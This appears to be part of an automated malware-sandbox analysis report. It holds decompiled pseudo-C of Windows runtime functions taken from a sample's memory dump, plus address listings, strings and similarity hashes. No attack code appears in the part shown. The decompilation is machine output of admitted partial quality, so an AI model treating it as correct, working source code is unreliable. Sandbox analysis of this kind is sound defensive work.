													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0181FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0181FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0181FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0181FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0181FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x18d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x18d7b84 = _t75;
						_t73 = E017FEB70(_t134, 0x18d7b60);
						if( *0x18d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E017FFF60( *0x18d7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                        0x0181fab0
                                                        0x0181fab2
                                                        0x0181fab3
                                                        0x0181fab4
                                                        0x0181fabc
                                                        0x0181fac0
                                                        0x0181fb14
                                                        0x0181fb17
                                                        0x0181fac2
                                                        0x0181fac8
                                                        0x0181facd
                                                        0x0181fad3
                                                        0x0181fad3
                                                        0x0181fadd
                                                        0x0181fb18
                                                        0x0181fb1b
                                                        0x0181fb1d
                                                        0x0181fb1e
                                                        0x0181fb1f
                                                        0x0181fb20
                                                        0x0181fb21
                                                        0x0181fb22
                                                        0x0181fb23
                                                        0x0181fb24
                                                        0x0181fb25
                                                        0x0181fb26
                                                        0x0181fb27
                                                        0x0181fb28
                                                        0x0181fb29
                                                        0x0181fb2a
                                                        0x0181fb2b
                                                        0x0181fb2c
                                                        0x0181fb2d
                                                        0x0181fb2e
                                                        0x0181fb2f
                                                        0x0181fb3a
                                                        0x0181fb3b
                                                        0x0181fb3e
                                                        0x0181fb41
                                                        0x0181fb44
                                                        0x0181fb47
                                                        0x0181fb4a
                                                        0x0181fb4d
                                                        0x0181fb53
                                                        0x0185bdcb
                                                        0x0185bdcb
                                                        0x0181fb59
                                                        0x0181fb5b
                                                        0x0181fb5b
                                                        0x0181fb5e
                                                        0x0185bdd5
                                                        0x0185bdd8
                                                        0x00000000
                                                        0x0185bdda
                                                        0x00000000
                                                        0x0185bdda
                                                        0x0181fb64
                                                        0x0181fb64
                                                        0x0181fb64
                                                        0x0181fb67
                                                        0x0181fb6e
                                                        0x0181fb70
                                                        0x0181fb72
                                                        0x00000000
                                                        0x0181fb78
                                                        0x0181fb7a
                                                        0x0181fb7a
                                                        0x0181fb7d
                                                        0x0181fb80
                                                        0x0185bddf
                                                        0x0185bde1
                                                        0x00000000
                                                        0x0185bde3
                                                        0x00000000
                                                        0x0185bde3
                                                        0x0181fb86
                                                        0x0181fb86
                                                        0x0181fb86
                                                        0x0181fb8b
                                                        0x0181fb90
                                                        0x0181fb92
                                                        0x0181fb94
                                                        0x0181fb9a
                                                        0x0181fb9b
                                                        0x0181fba1
                                                        0x0185bde8
                                                        0x0185bdeb
                                                        0x0185bded
                                                        0x0185beb5
                                                        0x0185beb5
                                                        0x0185bebb
                                                        0x0185bebd
                                                        0x0185bec3
                                                        0x0185bed2
                                                        0x0185bedd
                                                        0x0185bedd
                                                        0x0185beed
                                                        0x00000000
                                                        0x0185bdf3
                                                        0x0185bdfe
                                                        0x0185be06
                                                        0x0185be0b
                                                        0x0185be0d
                                                        0x0185be0f
                                                        0x0185be14
                                                        0x0185be19
                                                        0x0185be20
                                                        0x0185be25
                                                        0x0185be27
                                                        0x0185be35
                                                        0x0185be39
                                                        0x0185be46
                                                        0x0185be4f
                                                        0x0185be54
                                                        0x0185be56
                                                        0x0185bef8
                                                        0x0185bef8
                                                        0x00000000
                                                        0x0185be5c
                                                        0x0185be5c
                                                        0x0185be60
                                                        0x00000000
                                                        0x0185be66
                                                        0x0185be66
                                                        0x0185be7f
                                                        0x0185be84
                                                        0x0185be87
                                                        0x0185be89
                                                        0x0185be8b
                                                        0x0185be99
                                                        0x0185be9d
                                                        0x0185bea0
                                                        0x0185beac
                                                        0x0185beaf
                                                        0x0185beb1
                                                        0x0185beb3
                                                        0x0185beb3
                                                        0x00000000
                                                        0x0185bea2
                                                        0x0185bea2
                                                        0x00000000
                                                        0x0185bea2
                                                        0x0185be8d
                                                        0x0185be8d
                                                        0x0185be92
                                                        0x00000000
                                                        0x0185be92
                                                        0x0185be8b
                                                        0x0185be60
                                                        0x0185be3b
                                                        0x0185be3b
                                                        0x0185be3e
                                                        0x00000000
                                                        0x0185be40
                                                        0x0185be40
                                                        0x0185be44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0185be44
                                                        0x0185be3e
                                                        0x0185be29
                                                        0x0185be29
                                                        0x00000000
                                                        0x0185be29
                                                        0x0185be27
                                                        0x00000000
                                                        0x0181fba7
                                                        0x0181fba7
                                                        0x0181fbab
                                                        0x0185bf02
                                                        0x0181fbb1
                                                        0x0181fbb1
                                                        0x0181fbb8
                                                        0x0181fbbd
                                                        0x0181fbbd
                                                        0x0181fbbf
                                                        0x0181fbbf
                                                        0x0181fbc5
                                                        0x0181fbcb
                                                        0x0181fbf8
                                                        0x0181fbf8
                                                        0x0181fbfa
                                                        0x00000000
                                                        0x0181fc00
                                                        0x0181fc00
                                                        0x0181fc03
                                                        0x00000000
                                                        0x0181fc09
                                                        0x0181fc09
                                                        0x0181fc0f
                                                        0x0181fc15
                                                        0x0181fc23
                                                        0x0181fc23
                                                        0x0181fc25
                                                        0x0181fc27
                                                        0x0181fc75
                                                        0x0181fc7c
                                                        0x0181fc84
                                                        0x00000000
                                                        0x0181fc29
                                                        0x0181fc29
                                                        0x0181fc2d
                                                        0x0181fc30
                                                        0x0185bf0f
                                                        0x00000000
                                                        0x0181fc36
                                                        0x0181fc38
                                                        0x0181fc3b
                                                        0x0181fc41
                                                        0x0185bf17
                                                        0x0185bf19
                                                        0x0185bf48
                                                        0x0185bf4b
                                                        0x00000000
                                                        0x0185bf1b
                                                        0x0185bf22
                                                        0x0185bf24
                                                        0x0185bf26
                                                        0x00000000
                                                        0x0185bf2c
                                                        0x0185bf37
                                                        0x0185bf39
                                                        0x0185bf3b
                                                        0x00000000
                                                        0x0185bf41
                                                        0x0185bf41
                                                        0x0185bf41
                                                        0x0185bf41
                                                        0x0185bf45
                                                        0x00000000
                                                        0x0185bf45
                                                        0x0185bf3b
                                                        0x0185bf26
                                                        0x00000000
                                                        0x0181fc47
                                                        0x0181fc47
                                                        0x0181fc49
                                                        0x0181fcb2
                                                        0x0181fcb4
                                                        0x0181fcb6
                                                        0x0181fcdc
                                                        0x0181fcdc
                                                        0x00000000
                                                        0x0181fcb8
                                                        0x0181fcc3
                                                        0x0181fcc5
                                                        0x0181fcc7
                                                        0x00000000
                                                        0x0181fcc9
                                                        0x0181fcc9
                                                        0x0181fccd
                                                        0x00000000
                                                        0x0181fccd
                                                        0x0181fcc7
                                                        0x00000000
                                                        0x0181fc4b
                                                        0x0181fc4b
                                                        0x0181fc4e
                                                        0x0181fc4e
                                                        0x0181fc51
                                                        0x0181fc51
                                                        0x0181fc54
                                                        0x0181fc5a
                                                        0x0181fc5c
                                                        0x0181fc5f
                                                        0x0181fc61
                                                        0x0181fc63
                                                        0x0181fc65
                                                        0x0181fc67
                                                        0x0181fc6e
                                                        0x0181fc72
                                                        0x0181fc72
                                                        0x0181fc72
                                                        0x0181fc72
                                                        0x0181fc67
                                                        0x0181fc61
                                                        0x00000000
                                                        0x0181fc5a
                                                        0x0181fc49
                                                        0x0181fc41
                                                        0x0181fc30
                                                        0x0181fc27
                                                        0x0181fc03
                                                        0x0181fbcd
                                                        0x0181fbd3
                                                        0x0181fbd9
                                                        0x0181fbdc
                                                        0x0181fbde
                                                        0x0181fc99
                                                        0x0181fc9b
                                                        0x0181fc9d
                                                        0x0181fcd5
                                                        0x0181fcd5
                                                        0x0181fc89
                                                        0x0181fc89
                                                        0x00000000
                                                        0x0181fc9f
                                                        0x0181fc9f
                                                        0x0181fca3
                                                        0x00000000
                                                        0x0181fca3
                                                        0x00000000
                                                        0x0181fbe4
                                                        0x0181fbe4
                                                        0x0181fbe4
                                                        0x0181fbe4
                                                        0x0181fbe9
                                                        0x0181fbf2
                                                        0x00000000
                                                        0x0181fbf2
                                                        0x0181fbde
                                                        0x0181fbcb
                                                        0x0181fbab
                                                        0x0181fc8b
                                                        0x0181fc8b
                                                        0x0181fc8c
                                                        0x0181fb80
                                                        0x0181fb72
                                                        0x0181fb5e
                                                        0x0181fc8d
                                                        0x0181fc91
                                                        0x0181fadf
                                                        0x0181fadf
                                                        0x0181fae1
                                                        0x0181fae4
                                                        0x0181fae7
                                                        0x0181faec
                                                        0x0181faf8
                                                        0x0181fb00
                                                        0x0181fb07
                                                        0x0181fb0f
                                                        0x0181fb0f
                                                        0x0181fb07
                                                        0x00000000
                                                        0x0181faf8
                                                        0x0181fadd

                                                        Strings
                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0185BE0F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                        • API String ID: 0-865735534
                                                        • Opcode ID: d11d8bb6fae9750320e475669c0e11b7a1870a6ba17441dfe8ebcfdf6a58d716
                                                        • Instruction ID: bcc0a151b98bf71f02d911ea776af6c810daac8affe952a00259fbea905f16a2
                                                        • Opcode Fuzzy Hash: d11d8bb6fae9750320e475669c0e11b7a1870a6ba17441dfe8ebcfdf6a58d716
                                                        • Instruction Fuzzy Hash: 2AA13372B006168BEB25CB6CC450B7AB7A9FF58724F04456DEB06CB385DB34DA09DB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 63%
                                                        			E017E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x18d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x18d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018297C0();
				}
				if( *0x18d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01811624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01807D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0187FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01829520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0181E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0183DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x18d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x18d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01829980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01807D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01807D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01867016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0187FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x18d5350;
							if(_t109 != 0x18d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0187FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01875720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                        0x017e2d8a
                                                        0x017e2d8a
                                                        0x017e2d92
                                                        0x017e2d96
                                                        0x017e2d9e
                                                        0x017e2da0
                                                        0x017e2da3
                                                        0x017e2da5
                                                        0x017e2da8
                                                        0x017e2dab
                                                        0x017e2db2
                                                        0x0183f9aa
                                                        0x0183f9ab
                                                        0x0183f9ae
                                                        0x0183f9ae
                                                        0x017e2db8
                                                        0x017e2dc2
                                                        0x0183f9b9
                                                        0x0183f9be
                                                        0x0183f9bf
                                                        0x0183f9bf
                                                        0x017e2dcf
                                                        0x0183f9c9
                                                        0x017e2dd5
                                                        0x017e2dd5
                                                        0x017e2dd5
                                                        0x017e2dde
                                                        0x017e2de1
                                                        0x017e2e70
                                                        0x017e2e72
                                                        0x017e2e72
                                                        0x017e2de7
                                                        0x017e2deb
                                                        0x017e2e7c
                                                        0x017e2e83
                                                        0x017e2e85
                                                        0x017e2e8b
                                                        0x017e2e8d
                                                        0x017e2e92
                                                        0x017e2e92
                                                        0x017e2e85
                                                        0x017e2df1
                                                        0x017e2df7
                                                        0x017e2df9
                                                        0x017e2df9
                                                        0x017e2dfc
                                                        0x017e2dff
                                                        0x017e2e02
                                                        0x00000000
                                                        0x017e2e05
                                                        0x017e2e0c
                                                        0x0183f9d9
                                                        0x017e2e12
                                                        0x017e2e12
                                                        0x017e2e12
                                                        0x017e2e1a
                                                        0x0183f9e3
                                                        0x0183f9e9
                                                        0x0183f9f0
                                                        0x0183f9f6
                                                        0x0183f9f8
                                                        0x0183f9f8
                                                        0x0183f9f0
                                                        0x017e2e23
                                                        0x0183fa02
                                                        0x0183fa03
                                                        0x0183fa05
                                                        0x0183fa06
                                                        0x00000000
                                                        0x017e2e29
                                                        0x017e2e29
                                                        0x017e2e2e
                                                        0x017e2e34
                                                        0x017e2e3e
                                                        0x00000000
                                                        0x00000000
                                                        0x017e2e44
                                                        0x017e2e47
                                                        0x017e2e4d
                                                        0x00000000
                                                        0x00000000
                                                        0x017e2e4f
                                                        0x017e2e54
                                                        0x00000000
                                                        0x00000000
                                                        0x017e2e5a
                                                        0x017e2e5f
                                                        0x017e2e9a
                                                        0x017e2ea4
                                                        0x017e2ea5
                                                        0x017e2ea8
                                                        0x017e2eaf
                                                        0x017e2eb2
                                                        0x017e2eb5
                                                        0x0183fae9
                                                        0x0183faeb
                                                        0x0183faed
                                                        0x0183faef
                                                        0x0183faf7
                                                        0x0183faf8
                                                        0x0183fafd
                                                        0x0183faff
                                                        0x0183fb04
                                                        0x0183fb04
                                                        0x0183faff
                                                        0x017e2ec0
                                                        0x017e2ec4
                                                        0x017e2ec6
                                                        0x017e2ec8
                                                        0x0183fb14
                                                        0x0183fb18
                                                        0x0183fb1e
                                                        0x0183fb21
                                                        0x0183fb21
                                                        0x017e2ece
                                                        0x017e2ece
                                                        0x017e2ece
                                                        0x017e2ed7
                                                        0x017e2e61
                                                        0x017e2e63
                                                        0x0183fa6b
                                                        0x0183fa71
                                                        0x0183fa76
                                                        0x0183fa78
                                                        0x0183fa8a
                                                        0x0183fa7a
                                                        0x0183fa83
                                                        0x0183fa83
                                                        0x0183fa8f
                                                        0x0183fa91
                                                        0x0183fa97
                                                        0x0183fa9d
                                                        0x0183faa4
                                                        0x0183faaa
                                                        0x0183faaf
                                                        0x0183fab1
                                                        0x0183fac3
                                                        0x0183fab3
                                                        0x0183fabc
                                                        0x0183fabc
                                                        0x0183fac8
                                                        0x0183facb
                                                        0x0183fadf
                                                        0x0183fadf
                                                        0x0183facb
                                                        0x0183faa4
                                                        0x0183fa91
                                                        0x017e2e6f
                                                        0x017e2e6f
                                                        0x017e2e5f
                                                        0x0183fa13
                                                        0x0183fa15
                                                        0x0183fa17
                                                        0x0183fa1f
                                                        0x0183fa21
                                                        0x0183fa22
                                                        0x0183fa25
                                                        0x0183fa28
                                                        0x0183fa2f
                                                        0x0183fa2f
                                                        0x0183fa2a
                                                        0x0183fa2a
                                                        0x0183fa2a
                                                        0x0183fa31
                                                        0x0183fa34
                                                        0x0183fa36
                                                        0x0183fa3c
                                                        0x0183fa3e
                                                        0x0183fa41
                                                        0x0183fa43
                                                        0x0183fa45
                                                        0x0183fa45
                                                        0x0183fa41
                                                        0x0183fa3c
                                                        0x0183fa4a
                                                        0x0183fa4f
                                                        0x0183fa51
                                                        0x0183fa53
                                                        0x0183fa56
                                                        0x0183fa5b
                                                        0x0183fa5e
                                                        0x00000000
                                                        0x0183fa5e
                                                        0x017e2e23

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Re-Waiting
                                                        • API String ID: 0-316354757
                                                        • Opcode ID: d5fd0e368c9082ce290e0c04d771e75d8d20507113923da59f624be1c9fda698
                                                        • Instruction ID: 404e14d79113ab24fadc0aff83187c4aae7cd00d8111e8881aadd16e1d676368
                                                        • Opcode Fuzzy Hash: d5fd0e368c9082ce290e0c04d771e75d8d20507113923da59f624be1c9fda698
                                                        • Instruction Fuzzy Hash: B0612931E006559FDB32DB6CC848B7EBBE8EB88718F180599DA11D72C2C7749A4187D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                        • Instruction ID: 48da6d2c423dc959f51cad724552076098093b12068b5340134bc2620d449942
                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                        • Instruction Fuzzy Hash: 60518C716007159BC322DF18C840A67BBF9FF58710F008929FA95C7690E7B4EA44CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01863540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        • Opcode ID: a2f784638612bcf49fa36b9cb2b902965ffcf1a2ff979b1801b0588b1ddf41d4
                                                        • Instruction ID: f73a41da116b5f344b193eeb4b29a0854363294fe03fac5b9c4bbd017597607a
                                                        • Opcode Fuzzy Hash: a2f784638612bcf49fa36b9cb2b902965ffcf1a2ff979b1801b0588b1ddf41d4
                                                        • Instruction Fuzzy Hash: 1A4131B1D0052D9BDB219A54CC85FAEB77CAB54714F0045A5EB09EB241DB309F88CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `
                                                        • API String ID: 0-2679148245
                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                        • Instruction ID: 33561afac1737517cc25dbfef92a6d7a12905f05f907f1d02473f7d9561eb8e0
                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                        • Instruction Fuzzy Hash: 8831D37260434A6BE720DE28CD85F9B7BE9EBC4754F144229FA58DB780D770EA04C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01814020 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018140E8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                        • API String ID: 0-996340685
                                                        • Opcode ID: 754f5590ebe1e0b20cb4e7f9ad474215e93ad9b74953eda4d83c590fdf0abbe1
                                                        • Instruction ID: fff1857ac323d0b18a230ef6c4f452339f54010182542ce5066ba0348665ea2e
                                                        • Opcode Fuzzy Hash: 754f5590ebe1e0b20cb4e7f9ad474215e93ad9b74953eda4d83c590fdf0abbe1
                                                        • Instruction Fuzzy Hash: 9A418276A00B4A9AD725DFB9C4406E7F7F8EF15710F00482EDAAAC3204E334A645CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01863884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryName
                                                        • API String ID: 0-215506332
                                                        • Opcode ID: 7047c0fbbc25f3de0b793bc189d1b88295048cfe53a0f1b8f5f7265580af16a3
                                                        • Instruction ID: 13fa9ff786095f4e46e2c4a110a6ff768274b4d5114f01f74ec80532f2aed319
                                                        • Opcode Fuzzy Hash: 7047c0fbbc25f3de0b793bc189d1b88295048cfe53a0f1b8f5f7265580af16a3
                                                        • Instruction Fuzzy Hash: 9531D432D0051AAFEB16DA5CC945E6BBBB8FB52B20F114169ED18E7291D6309F00CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
